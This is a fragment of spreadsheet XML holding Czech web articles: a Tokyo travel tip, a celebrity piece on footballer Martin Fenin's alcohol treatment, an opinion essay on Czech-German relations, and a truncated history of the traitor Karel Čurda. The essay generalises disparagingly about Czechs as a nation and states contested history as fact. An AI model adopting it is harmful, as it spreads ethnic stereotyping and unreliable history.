Mejdži Džingu (Meiji Jingu). Je to domov Tokyo Yakult Swallows, druhý nejstarší stadion v zemi, postavený již v roce 1926. Fanděte domácímu týmu se všemi fanoušky, kteří mávají zelenými deštníky ve vzduchu, když Vlaštovky skórují. Letecký pohled na slavný přechod Shibuya. (Timo Volz / Unsplash) A pokud budete mít po hře ještě trochu energie, naskočte na Ginza Line a projeďte se dvě zastávky do stanice Šibuja (Shibuya). Místní přechody jsou nejrušnější křižovatkou pro chodce na světě. Počkejte, až naskočí zelená. Pak se pod blikajícími světly všude kolem vydejte na druhou stranu ulice. Nebudete v tom sami. Dalších až 3 000 pěších dělá totéž. Typický tokijský způsob, jak ukončit rušný den. – ete – Autor: Tim Johnson Autor person Tim Johnson Rubrika transition_slide Inspirace</t>
  </si>
  <si>
    <t>20241201_125_3476721006_b9fdb7ee072933d169b7.html</t>
  </si>
  <si>
    <t>b9fdb7ee072933d169b7</t>
  </si>
  <si>
    <t>Martin Fenin o&amp;nbsp;protialkoholní léčbě i&amp;nbsp;rozvodu: Trhá mi srdce, že nevídám malou, přiznává někdejší fotbalová star</t>
  </si>
  <si>
    <t>Martin Fenin o&amp;nbsp;protialkoholní léčbě i&amp;nbsp;rozvodu: Trhá mi srdce, že nevídám malou, přiznává někdejší fotbalová star Martin Fenin o protialkoholní léčbě i rozvodu: Trhá mi srdce, že nevídám malou, přiznává někdejší fotbalová star Hlavní obsah 1. 12. 2024, 13:00 Článek Bývalý fotbalista Martin Fenin má stále problémy s alkoholem . Ačkoli absolvoval tříměsíční pobyt v léčebně, se závislostí bojuje i nadále. „Nemyslel jsem si, že budu abstinent,“ říká nyní pro Super.cz. Promluvil o rozvodu s manželkou Beátou i o dcerce, kterou v současné chvíli nemá možnost vídat. Protialkoholní léčba přišla nazmar. Někdejší fotbalová star, ve své době legendární Martin Fenin , přiznává, že ani v době tříměsíčního pobytu neměl pochybnosti o tom, že si ještě někdy přiťukne. „3 měsíce na těch terapiích jsem věděl, že se ještě někdy napiju. Nemyslel jsem si, že budu abstinent,“ přiznává v rozhovoru pro Super.cz. K absolvování léčby ho před několika měsíci přiměli kolegové z fotbalového světa, Milan Baroš (43) a Tomáš Ujfaluši . Smutný pohled na bývalou fotbalovou star Martina Fenina : Na večírku znovu neodolal alkoholu a takhle to dopadlo „ Milan Baroš a Tomáš Ujfaluši za mnou nečekaně přijeli domů na Stodůlky , vůbec nevím, jak mě tam našli. Víceméně mě to dojalo, že o mě mají strach. Chtěli, ať to udělám, dal jsem jim na to ruku. Nebýt jich, tak to neudělám,“ vzpomíná Fenin . Martinovy problémy s alkoholem byly zároveň jedním z důvodů vedoucích k rozvodu s půvabnou Beátou, s níž má tříletou dceru Miu. S dcerkou se dnes Martin nemůže stýkat. „Nejde o moji bývalou manželku, jde o to, že mi krvácí srdce, že nevidím malou. Když se malá narodila, měl jsem už po kariéře a mohl jsem s ní být každý den. Ten vztah jsme měli a máme strašně silný. To, že nevidím malou, to mi trhá srdce každý den,“ přiznává. Autor: Lea Součková Autor person Lea Součková</t>
  </si>
  <si>
    <t>1550000</t>
  </si>
  <si>
    <t>1360000</t>
  </si>
  <si>
    <t>20241201_126_3476710966_a1c9dd3b6eb302f4239b.html</t>
  </si>
  <si>
    <t>a1c9dd3b6eb302f4239b</t>
  </si>
  <si>
    <t>Český mýtus o&amp;nbsp;zlém Němci: historie česko-německých vztahů</t>
  </si>
  <si>
    <t>Český mýtus o&amp;nbsp;zlém Němci : historie česko-německých vztahů Český mýtus o zlém Němci : historie česko-německých vztahů Němci byli v české kotlině dřív než Češi . To je historický fakt. Máte rádi sebekritiku? Že ne? Nevadí, určitě prospěje. Mýtus, který Češi propagují již stovky let, totiž, že jako chudáci trpěli pod jhem Němců, je třeba už jednou provždy zrušit. Jsou to staré pověry a babské báchorky a na nich se rozhodně moderní společnost stavět nedá. Naopak podobné nenávistné řeči a plačky vedly k zasetí semen sváru mezi českými a německými obyvateli. A tak nikdy nežili pospolu v tom pravém slova smyslu: společenství. Když totiž neustále dráždíte hada bosou nohou, nemůžete se divit, že vás jednou uštkne. Tak ty hrozivé příběhy o českém mučednictví, jakže to němečtí kněží upálili ty české či pasovští drancovali jižní Čechy nebo henleinovci honili diverzantské Čechy , je třeba vnímat v historickém kontextu a dějové návaznosti. Šumavská hranice s Bavorskem : Němci proti Němcům Přemysl Otakar II. v roce 1273 připojil Královský hvozd na Šumavě ke svému území a přizval svobodné sedláky, aby se v něm usadili. Byli to převážně Němci a dostali zvláštní výsady. A jaké že to měli povinnosti? Přeci střežit hranici proti jejich krajanům, také Němcům . Moc štěstí jim to nepřineslo, protože pozdější panovníci opakovaně zastavovali šumavské hvozdy šlechtickým rodům a tak museli Králováci, jak se jim říkalo, opakovaně bojovat o svá práva. Česko-bavorské hranice se během staletí opětovně měnily. Tak třeba v roce 1764 a znovu v roce 1862 a samozřejmě za Mnichovské dohody. Tento příběh začíná a končí právě hranicemi. Hranicemi fiktivními, reálnými, hvozdy, které stavíte mezi sebe a ostatní, a pak je zase horko těžko boříte. Ale začněme raději časově od začátku. Němci : české historické černé svědomí Český stát, první uskupení českých kmenů, založil Němec Sámo . Pro ty méně chápavé. Sámo byl francký kupec. Frankové byli seskupením germánských kmenů. Němci měli s Českem své zkušenosti dávno před jeho současnými obyvateli. Byli tu totiž mnohem dřív než slovanské kmeny. Češi měli v nedávné historii obrovský problém se sudetskými Němci , a když Hitler přitvrdil ve svém důrazu na německou identitu a nakonec se Třetí říše rozpadla, ihned toho zneužili a vyhnali z Česka několik miliónů lidí, kteří zde bydleli, žili po staletí, a byli oprávněně členy této kultury. Termín Sudety poprvé užil alexandrijský řecký astronom a zeměpisec Klaudius Ptolemaios . Znamená to: pohoří divokých sviní . V roce 1903 použil dr. Franz Jesser poprvé termín sudetský Němec . Nějak se neujal, ale v roce 1930 se ho chytili henleinovci, kteří tím označovali všechny Němce žijící v tehdejším Československu . Trocha historického pozadí Samotný název Čechy , Bohemia zde zůstal po keltském kmenu Bójů, kteří zde působili ve 4. stol. př. n. l. Na přelomu letopočtu tady byli Markomani v Čechách a na Moravě Kvádové, germánské kmeny, a pak sem vpadli Hunové. Germánské kmeny se posunuly do Bavorska . Název Bavorsko je odvozeno právě od „ ti, kteří přišli ze země Bójů “. 5. století zaznamenalo germánský kmen Langobardů a Herulů. Pak se sem dostaly slovanské kmeny. Někteří historici tvrdí, že se náhle místní Germáni poslovanštili, ale vzhledem k tomu, že v 7. století se po porážce Avarů stal sjednotitelem slovanských kmenů Sámo, který byl Frank, nejspíš někde z Alsaska , takže Germán, to nezní úplně přesvědčivě. První český státní útvar založil Germán, no co vy na to, čeští vlastenci? Zvlášť vy z dezinformační scény, kteří tak třímáte svatováclavské korouhve? Francký král Karel Veliký byl v roce 800 n. l. korunován císařem říše římské. V podstatě to byla mnohonárodnostní říše. Náčelníci slovanských kmenů byli Karlovi podřízeni. Vykupovali si u něj mír každoročním poplatkem. To není zas taková nezávislost, jak by ji čeští romantici chtěli vidět. Jak to s věrozvěsty bylo doopravdy V roce 845 se v Řezně dalo pokřtít čtrnáct slovanských knížat. Sami moc křesťanství ani tomuto aktu nerozuměli, tak se brzo vrátili k původnímu pohanství. Současně v této době existovala Velkomoravská říše v čele s Mojmírem. Když zemřel, císař Ludvík Němec si v ní dosadil svého koně Rostislava. Ten jej nakonec přechytračil. Tehdy Rostislav vyslal posly k papežovi, aby mu zajistil učitele křesťanství. Papež však odmítl. Pochopil totiž, že se nejedná o upřímné zbožné přání, ale o snahu intrikovat proti Ludvíku Němci . Frustrovaný Rostislav požádal byzantského císaře o věrozvěsty. Tak se tedy na Moravu dostalo pravoslaví. Nešlo o žádný duchovní zájem či spirituální volbu, ale o prostou politickou machinaci, prosbu z nouze, a podle toho to taky vypadalo. Nechápu tedy, proč se slaví státní svátek věrozvěstů. Je to spíše svátek planého politického gesta. Ale chápu, že potřeba národních mýtů je opravdu obrovská. Bez pohádek by se Česko rozpadlo. Nakonec Svatopluk vyšachoval Rostislava. Svatopluk pak byl přemožen Ludvíkovým synem. A pak ho zase Svatopluk porazil. A tak pořád dokola. Češi jako jablko sváru uprostřed Evropy Latinští duchovní si na svárlivou slovanskou církev uprostřed Evropy stěžovali. Byla totiž příčinou mnohých schizmat, stejně jako později Husovy bláznivé myšlenky o neplatnosti sňatků, které mohly způsobit sociální rozvrat v celé Evropě . Na to, co svým chováním a hlavně zlými řečmi Češi způsobí sobě i okolnímu světu, nehleděli. A dnes to není jiné. Odnesli to tehdy věrozvěstové Konstantin a Metoděj, kteří jim chtěli pomoci. Konstantin musel v Římě na koberečku mnohé vysvětlovat a u toho zemřel. Metoděje zajali bavorští biskupové a věznili jej tři roky. Stačil však pokřtít v Čechách knížete Bořivoje. V roce 890 se Čechy připojily k Velké Moravě . Bylo tak učiněno aktem Arnulfa Korutanského , který propůjčil velkomoravskému knížeti Svatoplukovi Čechy v léno. A tento slepenec včetně Velkomoravské říše se za pár let, v roce 908 po bojích s Maďary, rozpadl na padrť. V 10. století se vyprofilovalo české knížectví. V polovině 11. století se více propojila Morava a Čechy. Češi si chtěli zajistit nezávislost, alespoň zdánlivě, a tak podporovali Jindřicha IV., kterému asistovali při několika vojenských výpravách. Jako odměnu dostal Vratislav II . královský titul. Čeští panovníci si v roce 1114 vyprosili titul říšského číšníka. Což znamenalo, že mohou volit jako jedni z mnoha římského císaře. Bylo to spíše formální postavení a dosti vachrlaté, jinak by nedávalo smysl, aby Frankové dál vysílali svá vojska proti Čechům . Fridrich II . vydal v roce 1212 v Basileji Bulla Aurea Siciliæ alá Zlatou bulu sicilskou , která zaručovala Přemyslu Otakarovi I. právo na české království. Říše římská zahrnovala řadu vévodství, knížectví a české království. Češi stáli poněkud stranou, žádný sněm říše se nekonal na jejich území. Říše byla v různých obdobích v úpadku, Ota Veliký , který znovu získal Řím , ji dal přídomek Svatá říše římská . Karel IV . byl jeden z mála výrazných českých panovníků, spíše česko-francouzských dle původu, který upevnil pozici Čech ve světě. V jeho době byly Čechy nejmocnějším královstvím ve střední Evropě . A i tak na něj plivají samotní čeští historici jako je Vlastimil Vondruška pomluvy o tom, že financoval parazity, dělal si z Čech kasičku a podobně. A to si pán říká seriózní historik. Za Karla V. se pro dřívější říši římskou začal používat oficiální termín: Svatá říše římská národa německého, název se ustanovil za doby jeho narození a to kolem roku 1500. Toto sousloví však existovalo mnohem dříve. Od roku 1526 byly Čechy de facto kolonií rodu Habsburků. V roce 1806 zanikla Svatá říše římská. Habsburkové se stali členy Německého spolku v roce 1815. Do roku 1866 v něm hlavní úlohu hrálo Rakousko až do chvíle, kdy v prusko-rakouské válce prohrálo kalhoty. Podmínky vzniku nového českého státu Revoluční hnutí v roce 1848 v Itálii a ve Francii podnítila i Čechy , kteří se začali v Praze na shromážděních v hospodách scházet jako šváby na pivo . Císař jim nakonec slíbil, že jim češtinu zrovnoprávní s němčinou ve školách a na úřadech. Češi však chtěli víc, chtěli austroslavickou federaci. Skoro se opakovala situace jako za Husa, který vyštval vzdělané německé mistry z univerzity. V roce 1882 se rozdělila Pražská univerzita na německou a českou. Stejné postavení získala čeština s němčinou až v roce 1897. Další příběh už znáte, po oslabení Rakousko-Uherska v první světové válce se Češi odvážili na to, zběhnout z císařské armády, a začali formovat svůj stát v exilu a v rámci domácího odboje, který jen tak tak nezaniknul. Naštěstí pro Čechy zemřel přestárlý císař František Josef I. a nestačil podepsat některé rozsudky smrti. Češi měli z pekla štěstí a podpořeni již zahraničním vlivem demokratického hnutí Francie a USA se odvážili zformovat svůj stát v roce 1918. Zase tedy závan Sáma, starého Franka možná odkudsi z Alsaska . Bez zahraniční podpory by Češi nebyli schopni založit státní celek, to je zcela jasné. A proč? Protože jsou dějiny Čech a Moravy posety neschopností se vzájemně domluvit a hlavní české politické produkty jsou hašteření a podrazy. Bohužel Čechům chronicky chybí dvě základní vlastnosti, a to je nadhled sama nad sebou a schopnost kulturní adaptace. Těžba lidí jako historický základ české státnosti Za doby Přemyslovců i Sáma byla takzvaná česká nezávislost vykoupena tím, že Češi a Moraváci obchodovali na trhu s otroky se svými sousedy, cizími lidmi a vlastními rodinami a prodávali je do otroctví. Sámo se v české kotlině nejpravděpodobněji objevil právě kvůli výhodnému nákupu otroků a napadla jej spásná myšlenka, jak tuto aktivitu vytěžit ještě lépe. Co kdyby se stal šéfem těch bossů, kteří s nimi obchodují? Vyšlo to. Mojmírovci i Přemyslovci v tom pokračovali a rovnou své státní útvary a jejich ekonomiku na produkci otroků počínaje dětí, kterým bylo 12 let, postavili. Kupovali si je islamisté z Cordoby, kde tehdy vládli muslimští šejkové a byzantští kněží, kteří potřebovali své kastráty na kostelní kůry. A samozřejmě děvčata putovala k islamistům do harémů. Když se o těchto faktech dnes píše, část Čechů dělá, že to je lež, protože to buď nikdy neslyšeli nebo spíše vždy dělali, že neslyší, druhá část uznale pokyvuje hlavou, že to bylo součástí jejich historie, a zdá se mi, že jsou na ní pomalu hrdí. Oběma dvěma skupinám však uniká to, že jejich reakce na tato fakta o nich vypovídá více než si dovedou představit. Co říci o člověku, který je hrdý na to, že jeho předci prodávali svou rodinu? Odpověď nechám na zvídavém čtenáři. Zvyk těžit vlastní lidi v Čechách zůstal až dodnes. Dnes jde o jiné způsoby, jak zhodnotit vlastní rodinu či lidi kolem sebe, ale v průběhu české historie se ošklivé podoby tohoto otroctví objevovaly neustále. Za Bílé hory byla obětována intelektuální elita národa za pohodičku těch obyčejných českých lidiček, aby věci zůstaly tak, jak vždy byly, akorát se překabátilo vyznání z protestantského na katolické, aby se tak vykompenzovala česká porucha kulturní adaptace. Za totality zde byli Muklové, muži určení k likvidaci, kteří měli vykoupit cenu spojenectví Čechů a Rusů. Jaký je vedlejší efekt české participace na společenském zlu? Je to ten mýtus o zlém sousedovi, který malému Čechovi tak ubližuje. Kdo tu ubližuje vlastním lidem, je už nabíledni. Češi se tím jen snaží zakrýt svou vlastní nesnášenlivou a rigidní povahu. Když v roce 1918 vznikl nový český stát, prezident Masaryk se zaměřil především na fungování podniků, které Češi zkonfiskovali z původní říše a na Sudety se zapomnělo. Není divu, že zde vyrostla velká obří příšera nespokojenosti, kdy příhraniční Němci neměli do čeho píchnout a bouřili se. Nálady přikouřil rostoucí nacismus v Německu . Dál to znáte. České spolky, které živí xenofobický nacionalismus Různých nacionálních sdružení, která jsou monitorována českými tajnými službami, je hodně. V několika z nich působí bývalý skinhead Daniel Landa . Je to Spolek na podporu Zlatého špendlíku a Obrozenci . Když se podíváte na oficiální webové stránky těchto sdružení, hned vám do nosu brnkne jejich lačnost po vašich penězích. Můžete si koupit členství a za to získat falešný pocit národní hrdosti na úkor ostatních Čechů , kteří si ho nezaplatili. Tak o to tu jde, aby si Češi ochránili svůj zlatý špendlík, ne o ochranu hranic, národní hrdost, ale zase o peníze. Paradoxem všeho je to, že má pan Landa manželku německé národnosti. Tito pánové a organizace se živí na vyvolávání umělé nacionální horlivosti a hlavně na podněcování strachu vůči čemukoliv novému a jinému. Tak třeba takzvaná Národní domobrana si hraje na české obránce hranic. Proti komu, to nelze přesně identifikovat. Současný cíl je nyní jasný, Rusko je bratr a Němec spolu s NATO a USA zlý pán. Češi zkrátka různé takové falešné nacionální spolky milují a jejich promotéři jsou štědře financování svou suitou naivních nohsledů. Němci vs. Češi Vraťme se k otázce česko-německých vztahů a uměle nastaveným hranicím mezi nimi. Například Židé si dělají nárok na Palestinu již více než dva tisíce let. Němci by podle stejného měřítka mohli činit ještě mnohem větší nároky na Čechy, jak pramení z historického diskurzu. To je jedno možné politické hledisko. Jiné hledisko je psychologické. Vzhledem k tomu, že se Češi neumí mezi sebou domluvit, tak připomínají skupinu nesvéprávných lidí, kteří potřebují vedení někoho, kdo to má v hlavě v pořádku. A do této role se stavěli Němci po celou dobu existence Čech a Moravy . Ironií je to, že i když mají Češi nakonec demokratické zřízení a svůj vlastní stát, jsou zcela ekonomicky a politicky závislí na Německu . Nemůžou prostě jinak. Na víc nemají, ani kdyby se postavili na hlavu. Česko se často líčí jako německá montovna a bez návaznosti na německou ekonomiku nemá šanci dlouho přežít. Tak jsou vlastně Češi ekonomicky dál jednou z kolonií říše Římské vedené německými vládci. Často Češi oponují, že mají přece dost chytrých hlav a šikovných ručiček, ale to nevypovídá nic o neschopnosti jejich psychiky přizpůsobit se měnícímu se prostředí a vlivům z jejich okolí a adekvátně na ně reagovat. Zloba na Němce Je poměrně pochopitelné, že když jste tisíciletí v podřízeném postavení vůči různým národům, tak se ve vás zformuje jistý komplex méněcennosti, který z Čechů přímo kape všemi póry. Je poznat v obyčejném denním styku, na úřadech, v obchodě a průmyslu, v rodinách, v reakcích na diskuzi na internetu, v politické a diplomatické komunikaci, prostě všude. Projevuje se také pliváním na světová náboženství a kultury jako je islám, se kterým paralelně s tím Češi vedou čilé obchodní styky od svého počátku. Kdyby byli Češi obklopeni někým jiným než Němci či Rakušáky, ale třeba Francouzi nebo Italy, nejspíš by se snažili očerňovat někoho jiného. Veškeré nenávistné projevy vůči Němcům , které v Čechách byly či jsou, se dají připsat na vrub těmto mentálním konstelacím. Přitom řadu vůdčích postav českého kulturního a politického života tvořili právě Němci . Třeba Brno bylo ještě do druhé světové války ze dvou třetin německé. Základy české kultury a literatury tedy položili rovněž Němci , ať se vám to líbí nebo ne, a tvrdit něco jiného je tmářství. Není tedy důvodu se vyhraňovat proti Němcům stejně jako jakémukoliv jinému národu tak, jak Češi činí, aby si ulevili svému psychologickému přetlaku. Možná je jim tato česká kotlina až příliš malá a cítí se v ní poněkud stísněně natolik, až to v nich spíná psychózu. Jejich problém. Rozhodně není důvod ji řešit xenofobií. Naopak české mentalitě by prospělo, kdyby podobně jako nějaký zodpovědný duševně problematický pacient přiznala problém a začala se léčit. Nastoupit léčbu z nenávisti a předsudků a nepřizpůsobivosti a popírání historické reality je v současném globálním světě pro Čechy naprosto nezbytné k jejich kulturnímu přežití. Až budete příště vyhazovat někoho z Česka kvůli jeho barvě pleti, místu původu, náboženství, bože chraň i kvůli odlišnému názoru od toho vašeho, vzpomeňte si na to, komu tato země patří. Rozhodně ne xenofobům. Článek je chráněn kletbou. Zdroje: Becher. P. Kompendium německé literatury českých zemí. 2022. Academia . Petr Charvát. Zrod českého státu. 2007. Vyšehrad . Robert Novotný. Karel IV. Císař římský, král český. 2012. CPress. Otto Urban . České a slovenské dějiny do roku 1918. 1991. Svoboda. Pavel Macháček. Cesta Čechů a Němců k dnešku. 2002. Aventinum. Whaley Joachim. The Holy Roman Empire. 2018. Oxford . Zdeněk Šmída. Tajemství Šumavské hranice. 2019. Starý most. https://www.idnes.cz/zpravy/domaci/lucemburska-epopej-karel-iv-vlastimil-vondruska-historie.A221111_170040_domaci_albe</t>
  </si>
  <si>
    <t>20241201_127_3476672008_4b8813bf36f1c2f3ade1.html</t>
  </si>
  <si>
    <t>4b8813bf36f1c2f3ade1</t>
  </si>
  <si>
    <t>Karel Čurda: Dvě fáze zrady</t>
  </si>
  <si>
    <t>Karel Čurda : Dvě fáze zrady Karel Čurda , dnes chápaný jako archetyp zrádce, je v historii operace Anthropoid i v kontextu druhého československého odboje tragickou postavou. Jeho zrada ale měla, na rozdíl od jiných defektorů, dvě fáze. Zvláštním výcvikem pro nasazení do vlasti prošlo v Británii přes 200 československých vojáků. Nasazení do akce se jich ve 29 výsadcích dočkalo 85 a jejich ztráty na životech dosáhly 50 %. Výcvik byl ve své době velmi kvalitní, nicméně poměrně krátký, a především byl pouze fyzický. Obsahoval aspekty vojenské, zpravodajské i sabotážní, ale stránka psychická byla poněkud opomenuta. Zvláště zpočátku měl navíc zahraniční odboj jen velmi mlhavou představu o poměrech v protektorátě a vysílaní parašutisté byli vybaveni poměrně nedostatečně, jak co se týče výzbroje, tak dokladů, a především informací. V prvních dvou vlnách výsadků (1941-1943) se tak ze 37 mužů, kteří do akce odletěli, dožilo konce války jen pět, ztráty tedy dosáhly téměř 90 %. Čurda nebyl zdaleka jediným z řad československých parašutistů, který „zradil“. To slovo není ale úplně na místě, tzv. padákoví agenti většinou souhlasili se spoluprací s gestapem až v situaci, kdy byli dopadeni a neviděli jinou možnost, jak si zachovat život. Čurdova motivace byla podobná, ale on se nepříteli v pro něj bezvýchodné situaci nabídl sám, aniž by byl dopaden, a ke spolupráci se postupně propracoval. Gestapo na dopadené parašutisty působilo psychologicky v tom smyslu, že spoluprací s ním nikoho nezrazují, ale naopak, že zabraňují dalším škodám, které působí protinacistický odboj celému národu, na který pak dopadají spravedlivá represivní opatření. Někteří z defektorů se snažili hrát s gestapem vlastní hru a kontaktovat odboj, nebo v rámci radiové protihry informovali ústřednu v Británii , že vysílají pod dozorem. To pro ně ovšem mělo fatální následky. Jiní spolupracovali nepříliš nadšeně a aktivně, a jakmile gestapo usoudilo, že mu k ničemu nejsou, zbavilo se jich. Další ale byli velmi poslušní a samostatně aktivní, třebaže si uvědomovali tragédii toho, čeho se dopouštějí, a mezi ně právě Čurda patřil. Jeho přiznání na gestapu bylo vedeno snad pochopitelným motivem strachu o rodinu a Čurda byl údajně odhodlán po přiznání spáchat sebevraždu. Gestapo u něj objevilo ukrytou kyanidovou pilulku až po několika výsleších a osobních prohlídkách. Sebevraždu ale nespáchal a bez větších problémů vypověděl vše, co věděl. Z člověka, kterého zlomila situace, což se mohlo stát leckomu, se ale záhy stal spolehlivým, výkonným a dobře placeným agentem gestapa, který aktivně spolupracoval, fungoval pro gestapo jako volavka a nikdy se, na rozdíl od některých jiných defektorů, nesnažil ze svého osudu vyvázat. Karel Čurda se narodil 11. 10. 1911 v jihočeské Nové Hlíně (v té době součásti Staré Hlíny), dnes části Třeboně . Otec František byl nádeníkem, matka Rosalie, rozená Nováčková, byla v domácnosti. Měl dvě starší sestry a tři bratry. Vychodil obecnou školu ve Staré Hlíně a dvě třídy měšťanky v Třeboni . Po ukončení školy se v roce 1924 začal učit zedníkem. V roce 1926 mu zemřel otec a Čurda se začal živit v různých zaměstnáních. Při odvodu v roce 1933 uvedl do dotazníku v kolonce zaměstnání, že je kočím, resp. koňákem. Vojenskou základní službu nastoupil v listopadu 1933 ke 12. polní (kulometné) rotě Pěšího pluku 29 „Pplk. J. J. Švece“ V Třeboni . Na jaře následujícího roku absolvoval poddůstojnickou školu, svými nadřízenými byl hodnocen slovy: „Temperamentní a upřímná povaha, schopný a chápavý, snaživý a vytrvalý. Svědomitý a spolehlivý, rázný a duchapřítomný“. Dále absolvoval instruktorský výcvik a koncem roku byl povýšen do hodnosti svobodníka. Jistota armádní služby se Čurdovi , stejně jako mnoha jeho dalším kolegům, zalíbila, a po povýšení na desátníka se stal od listopadu 1935 délesloužícím s kontraktem na dva roky. Postupně byl velitelem družstva, cvičitelem nováčků a zástupcem velitele čety v poddůstojnické škole. V září 1936 dosáhl hodnosti četaře. V červnu 1937 získal odznak „elitního střelce“ a koncem léta byl jmenován trubačem II. praporu. K 1. listopadu 1937 mu byl dvouletý závazek prodloužen, ale počátkem června 1938 Čurda na vlastní žádost vojenskou kariéru ukončil, zvolil jistější povolání a stal se dozorcem Finanční stráže. Přidělen byl do Hati v Hlučínském výběžku a jakožto příslušník FS byl zařazen do Stráže obrany státu. Následovala služba v Bílé u Starých Hamrů a v Lošově u Olomouce . Po roční službě u FS, 17. června 1939, odešel Čurda přes zelenou hranici do exilu, údajně dokonce v uniformě. Stal se tak jedním z prvních vojáků čs. zahraničního odboje. V Krakově poznal i Gabčíka a Kubiše, muže, pro něž se měl stát osudovou osobou. Stejně jako oni absolvoval transport na lodi Chrobry do Francie , podepsal závazek do Cizinecké legie, odjel do Afriky a nastoupil službu u 1. pluku v Aïn El Hadjar poblíž Saïdy. I jeho další cesta kopírovala osud ostatních, po vypuknutí války byl z Legie propuštěn a nastoupil službu u čs. zahraničního vojska v Agde v 10. rotě 1. pěšího pluku. V lednu 1940 dosáhl hodnosti rotného a byl převelen ke 3. pěšímu pluku. Ten se bojů ve Francii nezúčastnil. Po pádu Francie byl jako mnozí ostatní evakuován do Velké Británie , kam připlul v červenci 1940. V srpnu byl zařazen k automobilní rotě 1. čs. smíšené brigády. V září 1941 dobrovolně nastoupil do výběrového sabotážního kurzu (spolu se dvaceti dalšími vojáky, mj. se svým pozdějším velitelem Opálkou se účastnil třetí vlny kurzu), po kterém následoval obvyklý paravýcvik. Po jeho absolvování se na necelé tři měsíce vrátil k jednotce. Koncem ledna 1942 prodělal útočný kurz na Bellasis (což byla jasná známka toho, že byl vybrán jako kádrová rezerva pro konkrétní úkol) a počátkem února byl převeden k londýnskému MNO, v jehož stavu čekal na nasazení. Dnes některými autory občas zmiňovaná podezření, údajně vládnoucí již při výcviku, že je Čurda neschopná osoba, alkoholik a nespolehlivý element, jsou holým nesmyslem. Hodnocení jeho nadřízených během výcviku v Británii neobsahuje žádné podezření stran jeho vlastností nebo osobnostní integrity: „Živý, starostlivý, samostatný, energický, schopen jako velitel družstva, jako zástupce velitele čety a řidič, má vliv na mužstvo… Energický, velmi dobrých znalostí a schopností. Velmi dobře způsobilý k vedení menší jednotky. Samostatný a spolehlivý pracovník. Velmi dobrý poddůstojník… Veselý, kamarádský, dobrosrdečný, skromný, méně chápavý, méně inteligentní. Smělý, odvážný, se smyslem pro kolektivní práci, ukázněný, spolehlivý. Velmi zdatný, schopný těžkých námah…“. Při speciálním výcviku dosahoval ve všech předmětech stupně dobrý nebo velmi dobrý. Prostě ne bůhvíjak chytrý, ale poslušný a výkonný, u vojáka ideální vlastnosti. Jedinou kádrovou skvrnou na Čurdově profilu tak zůstává jeho počínající obliba alkoholických nápojů, díky které se v Británii zamotal do již zmiňované hospodské strkanice, ovšem spolu s několika dalšími vojáky včetně Gabčíka, který mu ovšem k vyřešení situace nabízel vlastní pistoli. Spolu s Gabčíkem a Kubišem měl Čurda velmi podobný sociální původ, vzdělání, zaměstnání i osudy během exilu a vojenské služby v zahraničí. Stejně tak je pojilo i, zdá se, upřímné vlastenectví. Ohledně alkoholu lze snad jen dodat, že v době, kdy čekali na nasazení, chlastali v podstatě všichni adepti na nasazení velmi zdatně a ze zcela pochopitelných důvodů, jak dokazuje např. deník jejich výcvikáře, Rudolfa Hrubce . Všichni měli nervy na pochodu. Na nasazení čekali dlouhé měsíce, nebyla letadla, nebo výsadku nepřálo počasí, mnohokrát bylo vysazení odvoláno, a navíc zde hrály zásadní roli mezilidské vztahy. Skupiny totiž nebyly sestavovány podle preferencí jejich členů, dávalo je dohromady velení a zdaleka ne ve všech panoval kamarádský duch. Někteří velitelé skupin vojnu natolik „žrali“, že se ke svým podřízeným, ale především parťákům, na které se budou muset při nasazení stoprocentně spolehnout, i tak chovali povýšeně, nikoli jako partneři, ale jako „gumy“. Někteří se z nasazení vzhledem k neshodám s ostatními členy skupiny před seskokem i vyvázali, jako třeba rtm. Švachula, původní člen nešťastného výsadku Sulphur. Ten měl být původně čtyřčlenný, nakonec byli nasazeni jen dva členové. Smůla je provázela od počátku, po deseti dnech byli dopadeni a oba přislíbili gestapu spolupráci. Rtn. Oldřich Janko jako radista ale radiohru gestapa domluvenými signály znemožnil. Velitel, npor. Adolf Horák , se stal aktivním spolupracovníkem a podílel se na likvidaci výsadku Chalk. Oba byli ovšem nakonec popraveni v Terezíně v březnu 1945. 27. března 1942 byl vysazen spolu s Adolfem Opálkou a Ivanem Kolaříkem jako člen výsadku Out Distance, teprve čtvrtého výsadku do okupované vlasti, pokud počítáme jednotlivé lety (po dvou jednočlenných výsadcích, Benjamin a Percentage, byly při třetím letu najednou vysazeny skupiny Anthropoid, Silver A a Silver B). Výsadek byl, stejně jako drtivá většina ostatních, pronásledován smůlou hned zpočátku. Byl vysazen asi 130 km od plánovaného místa, většina operačního materiálu dopadla do vsi a byla ztracena, Opálka se při dopadu zranil, Kolařík při ukrývání zbytku materiálu ztratil osobní doklady, v nichž měl založenou fotografii jeho snoubenky, která díky razítku fotografa a vypsanému věnování umožnila rychlou identifikaci portrétované osoby. Skupina se teda hned nad ránem 28. března rozešla. Opálka a Kolařík hledali (v rozporu s rozkazy) pomoc u svých rodin, druhý jmenovaný, od počátku hledaný gestapem, spáchal 1. dubna sebevraždu. Čurda se rovněž přes příbuzné, známé i přes Londýnem doporučené kontakty nakonec dostal k odboji do Pardubic . Spolu s Opálkou, Valčíkem a Kubišem se v noci z 25. na 26. dubna účastnil zajištění neúspěšného náletu na plzeňskou Škodovku. Poté se zdržel týden u sestry v Kolíně a následně se ukrýval v různých konspiračních bytech odboje v Praze . V den atentátu si vyžádal od npor. Opálky dovolenou a odjel opět do Kolína , ale cestou ho zastihla zpráva o atentátu. Čurda se obratem vrátil do Prahy . Tato skutečnost jasně svědčí o tom, že informaci o provedení atentátu, nebo přinejmenším o konkrétním datu, kdy k němu dojde, skutečně neměli všichni členové výsadků, přítomní v Praze . Noc přečkal ukryt na prkně, položeném z okna do okna ve světlíku činžovního domu v Nuslích , zatímco v bytě proběhla policejní kontrola. Čurda následující den, nehledě na policejní uzávěru hlavního města, odjel ke své matce do jižních Čech , kde se skrýval na půdě až do osudového dne, kdy dospěl ke svému rozhodnutí. Během doby, kdy se ukrýval u matky, přestál se štěstím kontrolu četníků i zevrubnou prohlídku domu gestapem, při které jen náhodou nebyl doma. Dostávaly se k němu zprávy o represích, zatčeních, popravách, nakonec i o brutální likvidaci Lidic, a především o vyvraždění rodin jeho kolegů parašutistů Oldřicha Pechala a Ivana Kolaříka . Údajně na základě této skutečnosti a na základě příslibu beztrestnosti pro kohokoli, kdo podá důležité informace o „pachatelích“ atentátu se měl Čurda , lpící na své matce a přirozeně i na širším příbuzenstvu a přátelích v obci, rozhodnout ke zradě. Čurda měl údajně nejprve napsat 13. června anonymní udavačský dopis na četnickou stanici v Benešově , který ovšem zůstal bez odezvy. Historik Jiří Plachý ale v 